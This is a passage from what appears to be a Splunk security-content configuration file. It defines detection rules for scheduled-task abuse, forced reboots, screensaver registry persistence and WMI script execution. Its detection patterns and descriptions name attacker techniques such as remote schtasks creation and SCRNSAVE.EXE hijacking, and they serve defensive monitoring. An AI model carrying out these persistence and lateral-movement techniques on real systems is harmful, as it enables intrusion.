It is important to consider potential false positives. While administrators may create scheduled tasks on remote systems, this activity is typically limited to a small set of hosts or users.\ Identifying the creation of scheduled tasks on remote endpoints is crucial for a Security Operations Center (SOC) because it indicates potential unauthorized activity or an attacker attempting to establish persistence or execute malicious code. The impact of a true positive can be significant, leading to unauthorized access, data theft, or other damaging outcomes. During triage, investigate the source and purpose of the scheduled task, inspect relevant on-disk artifacts, and analyze concurrent processes to identify the extent of the attack and take appropriate response actions. action.notable.param.rule_title = Scheduled Task Creation on Remote Endpoint using At action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where (Processes.process_name=at.exe OR Processes.original_file_name=at.exe) (Processes.process=*\\\\*) by Processes.dest Processes.user Processes.parent_process_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)`| `security_content_ctime(lastTime)` | `scheduled_task_creation_on_remote_endpoint_using_at_filter` [ESCU - Scheduled Task Deleted Or Created via CMD - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic focuses on identifying the creation or deletion of scheduled tasks using the schtasks.exe utility with the corresponding command-line flags (-create or -delete). 
This technique has been notably associated with threat actors like Dragonfly and the SUNBURST attack against SolarWinds. The purpose of this analytic is to detect suspicious activity related to scheduled tasks that could indicate malicious intent or unauthorized system manipulation. By monitoring for these specific command-line flags, we can enhance our ability to identify potential threats and prevent attacks similar to the use of scheduled tasks in the BadRabbit Ransomware incident. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1053.005", "T1053"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This analytic focuses on identifying the creation or deletion of scheduled tasks using the schtasks.exe utility with the corresponding command-line flags (-create or -delete). This technique has been notably associated with threat actors like Dragonfly and the SUNBURST attack against SolarWinds. The purpose of this analytic is to detect suspicious activity related to scheduled tasks that could indicate malicious intent or unauthorized system manipulation. By monitoring for these specific command-line flags, we can enhance our ability to identify potential threats and prevent attacks similar to the use of scheduled tasks in the BadRabbit Ransomware incident. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. 
Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = While it is possible for legitimate scripts or administrators to trigger this behavior, filtering can be applied based on the parent process and application to reduce false positives. Analysts should reference the provided references to understand the context and threat landscape associated with this activity. action.escu.creation_date = 2023-12-27 action.escu.modification_date = 2023-12-27 action.escu.confidence = high action.escu.full_search_name = ESCU - Scheduled Task Deleted Or Created via CMD - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["AsyncRAT", "Winter Vivern", "Windows Persistence Techniques", "Living Off The Land", "Prestige Ransomware", "AgentTesla", "NjRAT", "RedLine Stealer", "Rhysida Ransomware", "Azorult", "DHS Report TA18-074A", "Scheduled Tasks", "Sandworm Tools", "Qakbot", "CISA AA22-257A", "Trickbot", "NOBELIUM Group", "Amadey", "DarkCrystal RAT", "CISA AA23-347A", "Phemedrone Stealer"] action.risk = 1 action.risk.param._risk_message = A schedule task process $process_name$ with create or delete commandline $process$ in host $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 56}, {"risk_object_field": "user", "risk_object_type": "user", "risk_score": 56}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Scheduled Task Deleted Or Created via CMD - Rule action.correlationsearch.annotations = 
{"analytic_story": ["AsyncRAT", "Winter Vivern", "Windows Persistence Techniques", "Living Off The Land", "Prestige Ransomware", "AgentTesla", "NjRAT", "RedLine Stealer", "Rhysida Ransomware", "Azorult", "DHS Report TA18-074A", "Scheduled Tasks", "Sandworm Tools", "Qakbot", "CISA AA22-257A", "Trickbot", "NOBELIUM Group", "Amadey", "DarkCrystal RAT", "CISA AA23-347A", "Phemedrone Stealer"], "cis20": ["CIS 10"], "confidence": 80, "impact": 70, "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1053.005", "T1053"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This analytic focuses on identifying the creation or deletion of scheduled tasks using the schtasks.exe utility with the corresponding command-line flags (-create or -delete). This technique has been notably associated with threat actors like Dragonfly and the SUNBURST attack against SolarWinds. The purpose of this analytic is to detect suspicious activity related to scheduled tasks that could indicate malicious intent or unauthorized system manipulation. By monitoring for these specific command-line flags, we can enhance our ability to identify potential threats and prevent attacks similar to the use of scheduled tasks in the BadRabbit Ransomware incident. 
action.notable.param.rule_title = Scheduled Task Deleted Or Created via CMD action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count values(Processes.process) as process values(Processes.parent_process) as parent_process min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name=schtasks.exe (Processes.process=*delete* OR Processes.process=*create*) by Processes.user Processes.process_name Processes.parent_process_name Processes.dest | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)`| `security_content_ctime(lastTime)` | `scheduled_task_deleted_or_created_via_cmd_filter` [ESCU - Scheduled Task Initiation on Remote Endpoint - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic detects instances of 'schtasks.exe' being used to start a Scheduled Task on a remote endpoint. Adversaries often abuse the Task Scheduler for lateral movement and remote code execution. The search parameters include process details such as the process name, parent process, and command-line executions. Although legitimate administrators may start scheduled tasks on remote systems, this activity is usually limited to a small set of hosts or users. The findings from this analytic provide valuable insight into potentially malicious activities on an endpoint. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1053", "T1053.005"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The following analytic detects instances of 'schtasks.exe' being used to start a Scheduled Task on a remote endpoint. 
Adversaries often abuse the Task Scheduler for lateral movement and remote code execution. The search parameters include process details such as the process name, parent process, and command-line executions. Although legitimate administrators may start scheduled tasks on remote systems, this activity is usually limited to a small set of hosts or users. The findings from this analytic provide valuable insight into potentially malicious activities on an endpoint. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Administrators may start scheduled tasks on remote systems, but this activity is usually limited to a small set of hosts or users. 
action.escu.creation_date = 2021-11-11 action.escu.modification_date = 2021-11-11 action.escu.confidence = high action.escu.full_search_name = ESCU - Scheduled Task Initiation on Remote Endpoint - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Active Directory Lateral Movement", "Living Off The Land", "Scheduled Tasks"] action.risk = 1 action.risk.param._risk_message = A Windows Scheduled Task was ran on a remote endpoint from $dest action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 54}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Scheduled Task Initiation on Remote Endpoint - Rule action.correlationsearch.annotations = {"analytic_story": ["Active Directory Lateral Movement", "Living Off The Land", "Scheduled Tasks"], "cis20": ["CIS 10"], "confidence": 60, "impact": 90, "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1053", "T1053.005"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic detects instances of 'schtasks.exe' being used to start a Scheduled Task on a remote endpoint. Adversaries often abuse the Task Scheduler for lateral movement and remote code execution. The search parameters include process details such as the process name, parent process, and command-line executions. Although legitimate administrators may start scheduled tasks on remote systems, this activity is usually limited to a small set of hosts or users. 
The findings from this analytic provide valuable insight into potentially malicious activities on an endpoint. action.notable.param.rule_title = Scheduled Task Initiation on Remote Endpoint action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where (Processes.process_name=schtasks.exe OR Processes.original_file_name=schtasks.exe) (Processes.process=*/s* AND Processes.process=*/run*) by Processes.dest Processes.user Processes.parent_process_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)`| `security_content_ctime(lastTime)` | `scheduled_task_initiation_on_remote_endpoint_filter` [ESCU - Schtasks Run Task On Demand - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic is designed to detect when a Windows Scheduled Task is executed on demand via shell or command line. Adversaries often force the execution of their created Scheduled Tasks for persistent access or lateral movement within a compromised machine. This analytic is driven by process-related data, specifically process name, parent process, and command-line executions, sourced from endpoint logs. The search criteria focus on 'schtasks.exe' with an associated 'run' command. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1053"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The following analytic is designed to detect when a Windows Scheduled Task is executed on demand via shell or command line. 
Adversaries often force the execution of their created Scheduled Tasks for persistent access or lateral movement within a compromised machine. This analytic is driven by process-related data, specifically process name, parent process, and command-line executions, sourced from endpoint logs. The search criteria focus on 'schtasks.exe' with an associated 'run' command. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Bear in mind, administrators debugging Scheduled Task entries may trigger this analytic, necessitating fine-tuning and filtering to distinguish between legitimate and potentially malicious use of 'schtasks.exe'. 
action.escu.creation_date = 2023-04-14 action.escu.modification_date = 2023-04-14 action.escu.confidence = high action.escu.full_search_name = ESCU - Schtasks Run Task On Demand - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Qakbot", "Industroyer2", "XMRig", "CISA AA22-257A", "Data Destruction", "Scheduled Tasks"] action.risk = 1 action.risk.param._risk_message = A "on demand" execution of schedule task process $process_name$ using commandline $process$ in host $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 48}, {"risk_object_field": "user", "risk_object_type": "user", "risk_score": 48}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Schtasks Run Task On Demand - Rule action.correlationsearch.annotations = {"analytic_story": ["Qakbot", "Industroyer2", "XMRig", "CISA AA22-257A", "Data Destruction", "Scheduled Tasks"], "cis20": ["CIS 10"], "confidence": 80, "impact": 60, "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1053"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic is designed to detect when a Windows Scheduled Task is executed on demand via shell or command line. Adversaries often force the execution of their created Scheduled Tasks for persistent access or lateral movement within a compromised machine. 
This analytic is driven by process-related data, specifically process name, parent process, and command-line executions, sourced from endpoint logs. The search criteria focus on 'schtasks.exe' with an associated 'run' command. action.notable.param.rule_title = Schtasks Run Task On Demand action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` values(Processes.process) as process values(Processes.process_id) as process_id count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name = "schtasks.exe" Processes.process = "*/run*" by Processes.process_name Processes.parent_process_name Processes.dest Processes.user | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `schtasks_run_task_on_demand_filter` [ESCU - Schtasks scheduling job on remote system - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic is designed to detect suspicious command-line arguments executed through 'schtasks.exe' to create a scheduled task on a remote endpoint. The analytic scans process data, checking for instances where 'schtasks.exe' has been used with specific command-line flags that suggest an attempt at lateral movement or remote code execution, common techniques employed by adversaries and red teams. Key data points include the process name, the specific command line used, the parent process name, the target destination, and the user involved. Also, timestamp data gives context to when these activities occurred. 
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1053.005", "T1053"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The following analytic is designed to detect suspicious command-line arguments executed through 'schtasks.exe' to create a scheduled task on a remote endpoint. The analytic scans process data, checking for instances where 'schtasks.exe' has been used with specific command-line flags that suggest an attempt at lateral movement or remote code execution, common techniques employed by adversaries and red teams. Key data points include the process name, the specific command line used, the parent process name, the target destination, and the user involved. Also, timestamp data gives context to when these activities occurred. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = While it is possible to have false positives, due to legitimate administrative tasks, these are usually limited and should still be validated and investigated as appropriate. 
action.escu.creation_date = 2022-05-23 action.escu.modification_date = 2022-05-23 action.escu.confidence = high action.escu.full_search_name = ESCU - Schtasks scheduling job on remote system - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Active Directory Lateral Movement", "NOBELIUM Group", "Living Off The Land", "Prestige Ransomware", "Scheduled Tasks", "RedLine Stealer", "Phemedrone Stealer"] action.risk = 1 action.risk.param._risk_message = A schedule task process $process_name$ with remote job command-line $process$ in host $dest$ by $user$. action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 63}, {"risk_object_field": "user", "risk_object_type": "user", "risk_score": 63}, {"risk_object_field": "process_name", "risk_object_type": "other", "risk_score": 63}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Schtasks scheduling job on remote system - Rule action.correlationsearch.annotations = {"analytic_story": ["Active Directory Lateral Movement", "NOBELIUM Group", "Living Off The Land", "Prestige Ransomware", "Scheduled Tasks", "RedLine Stealer", "Phemedrone Stealer"], "cis20": ["CIS 10"], "confidence": 90, "impact": 70, "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1053.005", "T1053"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic is designed to detect suspicious command-line arguments executed through 'schtasks.exe' to create a 
scheduled task on a remote endpoint. The analytic scans process data, checking for instances where 'schtasks.exe' has been used with specific command-line flags that suggest an attempt at lateral movement or remote code execution, common techniques employed by adversaries and red teams. Key data points include the process name, the specific command line used, the parent process name, the target destination, and the user involved. Also, timestamp data gives context to when these activities occurred. action.notable.param.rule_title = Schtasks scheduling job on remote system action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where (Processes.process_name = schtasks.exe OR Processes.original_file_name=schtasks.exe) (Processes.process="*/create*" AND Processes.process="*/s*") by Processes.process_name Processes.process Processes.parent_process_name Processes.dest Processes.user | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `schtasks_scheduling_job_on_remote_system_filter` [ESCU - Schtasks used for forcing a reboot - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic utilizes a Splunk query to pinpoint potential threats by monitoring the 'schtasks.exe' command-line usage. This particular command, especially when used in tandem with 'shutdown' and '/create' flags, can suggest an adversarial force intending to schedule unwarranted system reboots. The query focuses on endpoint process data and retrieves details such as the process name, the parent process name, the destination, and the user involved. 
Essential to the investigation are the earliest and latest timestamps of these events, providing an activity timeline. Data such as the targeted host and initiating user offer valuable context for analyst. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1053.005", "T1053"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The following analytic utilizes a Splunk query to pinpoint potential threats by monitoring the 'schtasks.exe' command-line usage. This particular command, especially when used in tandem with 'shutdown' and '/create' flags, can suggest an adversarial force intending to schedule unwarranted system reboots. The query focuses on endpoint process data and retrieves details such as the process name, the parent process name, the destination, and the user involved. Essential to the investigation are the earliest and latest timestamps of these events, providing an activity timeline. Data such as the targeted host and initiating user offer valuable context for analyst. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. 
action.escu.known_false_positives = This analytic may also capture legitimate administrative activities such as system updates or maintenance tasks, which can be classified as false positives. Filter as needed. action.escu.creation_date = 2020-12-07 action.escu.modification_date = 2020-12-07 action.escu.confidence = high action.escu.full_search_name = ESCU - Schtasks used for forcing a reboot - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Windows Persistence Techniques", "Ransomware", "Scheduled Tasks"] action.risk = 1 action.risk.param._risk_message = A schedule task process $process_name$ with force reboot commandline $process$ in host $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 56}, {"risk_object_field": "user", "risk_object_type": "user", "risk_score": 56}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Schtasks used for forcing a reboot - Rule action.correlationsearch.annotations = {"analytic_story": ["Windows Persistence Techniques", "Ransomware", "Scheduled Tasks"], "cis20": ["CIS 10"], "confidence": 80, "impact": 70, "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1053.005", "T1053"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic utilizes a Splunk query to pinpoint potential threats by monitoring the 'schtasks.exe' command-line usage. 
This particular command, especially when used in tandem with 'shutdown' and '/create' flags, can suggest an adversarial force intending to schedule unwarranted system reboots. The query focuses on endpoint process data and retrieves details such as the process name, the parent process name, the destination, and the user involved. Essential to the investigation are the earliest and latest timestamps of these events, providing an activity timeline. Data such as the targeted host and initiating user offer valuable context for analyst. action.notable.param.rule_title = Schtasks used for forcing a reboot action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` values(Processes.process) as process min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name=schtasks.exe Processes.process="*shutdown*" Processes.process="*/create *" by Processes.process_name Processes.parent_process_name Processes.dest Processes.user | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `schtasks_used_for_forcing_a_reboot_filter` [ESCU - Screensaver Event Trigger Execution - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic is developed to detect possible event trigger execution through screensaver registry entry modification for persistence or privilege escalation. This technique was seen in several APT and malware where they put the malicious payload path to the SCRNSAVE.EXE registry key to redirect the execution to their malicious payload path. This TTP is a good indicator that some attacker may modify this entry for their persistence and privilege escalation. 
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1546", "T1546.002"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This analytic is developed to detect possible event trigger execution through screensaver registry entry modification for persistence or privilege escalation. This technique was seen in several APT and malware where they put the malicious payload path to the SCRNSAVE.EXE registry key to redirect the execution to their malicious payload path. This TTP is a good indicator that some attacker may modify this entry for their persistence and privilege escalation. action.escu.how_to_implement = To successfully implement this search, you must be ingesting data that records registry activity from your hosts to populate the endpoint data model in the registry node. This is typically populated via endpoint detection-and-response product, such as Carbon Black or endpoint data sources, such as Sysmon. The data used for this search is typically generated via logs that report reads and writes to the registry. 
action.escu.known_false_positives = unknown
action.escu.creation_date = 2023-04-14
action.escu.modification_date = 2023-04-14
action.escu.confidence = high
action.escu.full_search_name = ESCU - Screensaver Event Trigger Execution - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"]
action.escu.analytic_story = ["Hermetic Wiper", "Windows Privilege Escalation", "Windows Persistence Techniques", "Windows Registry Abuse", "Data Destruction"]
action.risk = 1
action.risk.param._risk_message = modified/added/deleted registry entry $Registry.registry_path$ in $dest$
action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 72}, {"risk_object_field": "user", "risk_object_type": "user", "risk_score": 72}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Screensaver Event Trigger Execution - Rule
action.correlationsearch.annotations = {"analytic_story": ["Hermetic Wiper", "Windows Privilege Escalation", "Windows Persistence Techniques", "Windows Registry Abuse", "Data Destruction"], "cis20": ["CIS 10"], "confidence": 90, "impact": 80, "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1546", "T1546.002"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = This analytic is developed to detect possible event trigger execution through screensaver registry entry modification for persistence or privilege escalation. This technique was seen in several APT campaigns and malware families, where the malicious payload path is written to the SCRNSAVE.EXE registry key to redirect execution to that payload. This TTP is a good indicator that an attacker may have modified this entry for persistence and privilege escalation.
action.notable.param.rule_title = Screensaver Event Trigger Execution
action.notable.param.security_domain = endpoint
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime FROM datamodel=Endpoint.Registry where (Registry.registry_path="*\\Control Panel\\Desktop\\SCRNSAVE.EXE*") by Registry.dest Registry.user Registry.registry_path Registry.registry_key_name Registry.registry_value_name | `security_content_ctime(lastTime)` | `security_content_ctime(firstTime)` | `drop_dm_object_name(Registry)` | `screensaver_event_trigger_execution_filter`

[ESCU - Script Execution via WMI - Rule]
action.escu = 0
action.escu.enabled = 1
description = The following analytic detects any potential misuse of Windows Management Instrumentation (WMI) for malicious purposes, since adversaries often use WMI to run scripts, which allows them to carry out malicious activities without raising suspicion. The detection is made by monitoring the process 'scrcons.exe', which is essential to run WMI scripts. The detection is important because it proactively identifies and responds to potential threats that leverage WMI for malicious purposes, which can lead to system compromise, data exfiltration, or the establishment of persistence within the environment. False positives might occur since administrators might occasionally use WMI to launch scripts for legitimate purposes. Therefore, you must distinguish between malicious and benign activities.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation"], "mitre_attack": ["T1047"], "nist": ["DE.CM"]}
action.escu.data_models = ["Endpoint"]
action.escu.eli5 = The following analytic detects any potential misuse of Windows Management Instrumentation (WMI) for malicious purposes, since adversaries often use WMI to run scripts, which allows them to carry out malicious activities without raising suspicion. The detection is made by monitoring the process 'scrcons.exe', which is essential to run WMI scripts. The detection is important because it proactively identifies and responds to potential threats that leverage WMI for malicious purposes, which can lead to system compromise, data exfiltration, or the establishment of persistence within the environment. False positives might occur since administrators might occasionally use WMI to launch scripts for legitimate purposes. Therefore, you must distinguish between malicious and benign activities.
action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process.
action.escu.known_false_positives = Although unlikely, administrators may use WMI to launch scripts for legitimate purposes. Filter as needed.
action.escu.creation_date = 2020-03-16
action.escu.modification_date = 2020-03-16
action.escu.confidence = high
action.escu.full_search_name = ESCU - Script Execution via WMI - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"]
action.escu.analytic_story = ["Suspicious WMI Use"]
action.risk = 1
action.risk.param._risk_message = A wmic.exe process $process_name$ that executes a script on host $dest$
action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 36}, {"risk_object_field": "user", "risk_object_type": "user", "risk_score": 36}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Script Execution via WMI - Rule
action.correlationsearch.annotations = {"analytic_story": ["Suspicious WMI Use"], "cis20": ["CIS 10"], "confidence": 60, "impact": 60, "kill_chain_phases": ["Installation"], "mitre_attack": ["T1047"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = The following analytic detects any potential misuse of Windows Management Instrumentation (WMI) for malicious purposes, since adversaries often use WMI to run scripts, which allows them to carry out malicious activities without raising suspicion. The detection is made by monitoring the process 'scrcons.exe', which is essential to run WMI scripts. The detection is important because it proactively identifies and responds to potential threats that leverage WMI for malicious purposes, which can lead to system compromise, data exfiltration, or the establishment of persistence within the environment. False positives might occur since administrators might occasionally use WMI to launch scripts for legitimate purposes. Therefore, you must distinguish between malicious and benign activities.
action.notable.param.rule_title = Script Execution via WMI
action.notable.param.security_domain = endpoint
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
